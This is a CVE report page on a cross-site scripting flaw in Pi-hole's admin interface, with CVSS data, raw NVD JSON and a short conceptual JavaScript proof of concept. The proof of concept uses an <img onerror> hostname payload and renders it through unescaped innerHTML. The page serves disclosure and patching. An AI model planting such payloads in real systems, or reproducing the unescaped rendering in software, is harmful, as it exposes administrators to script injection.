Security Vulnerability Report
CVE-2026-33404 CVSS 3.4 LOW

Published: 2026-04-06 15:17:10
Last Modified: 2026-04-14 19:16:30

Description

Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, client hostnames and IP addresses from the FTL database are rendered into the DOM without escaping in network.js (Network page) and charts.js/index.js (Dashboard chart tooltips). While upstream validation in dnsmasq and FTL blocks HTML characters via normal DHCP/DNS paths, the web UI performs no output escaping — an inconsistency with other fields in the same file that are properly escaped. This vulnerability is fixed in 6.5.

CVSS Details

CVSS Score
3.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N
Note: the score above is the Secondary metric in the raw JSON below. The Primary metric in the same record rates the issue 6.1 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N), i.e. network attack vector, user interaction required and changed scope; use the one that matches your threat model when prioritising.
Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation, 'Cross-site Scripting')

Configurations (Affected Products)

cpe:2.3:a:pi-hole:web_interface:*:*:*:*:*:*:*:* - VULNERABLE
Pi-hole Admin Interface >= 6.0, < 6.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Conceptual Proof of Concept for CVE-2026-33404
// This demonstrates how the lack of output escaping in network.js can be exploited.

// Malicious payload simulating a compromised client hostname
// In a real scenario, this would be injected via DHCP or DNS records if upstream validation permits
var maliciousHostname = "<img src=x onerror=alert('XSS via CVE-2026-33404')>";

// Vulnerable code simulation in network.js (original vulnerable logic, not the actual file)
// The application takes the hostname directly from the database and assigns it to innerHTML
function renderHostname(data) {
  var element = document.getElementById('client-hostname');
  // VULNERABILITY: no sanitization or escaping of 'data.hostname'
  // If data.hostname contains HTML tags, they are rendered by the browser
  element.innerHTML = data.hostname;
}

// Triggering the vulnerability
var dbData = { hostname: maliciousHostname };

// When the admin views the Network page, this function runs,
// resulting in the execution of the alert() payload
renderHostname(dbData);

References

https://github.com/pi-hole/web/security/advisories/GHSA-px6w-85wp-ww9v (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33404", "sourceIdentifier": "[email protected]", "published": "2026-04-06T15:17:10.473", "lastModified": "2026-04-14T19:16:29.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, client hostnames and IP addresses from the FTL database are rendered into the DOM without escaping in network.js (Network page) and charts.js/index.js (Dashboard chart tooltips). While upstream validation in dnsmasq and FTL blocks HTML characters via normal DHCP/DNS paths, the web UI performs no output escaping — an inconsistency with other fields in the same file that are properly escaped. This vulnerability is fixed in 6.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pi-hole:web_interface:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndIncluding": "6.4.1", "matchCriteriaId": "3F1EA9FF-4B56-41DE-A685-A1B75E6ECEF2"}]}]}], "references": [{"url": "https://github.com/pi-hole/web/security/advisories/GHSA-px6w-85wp-ww9v", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}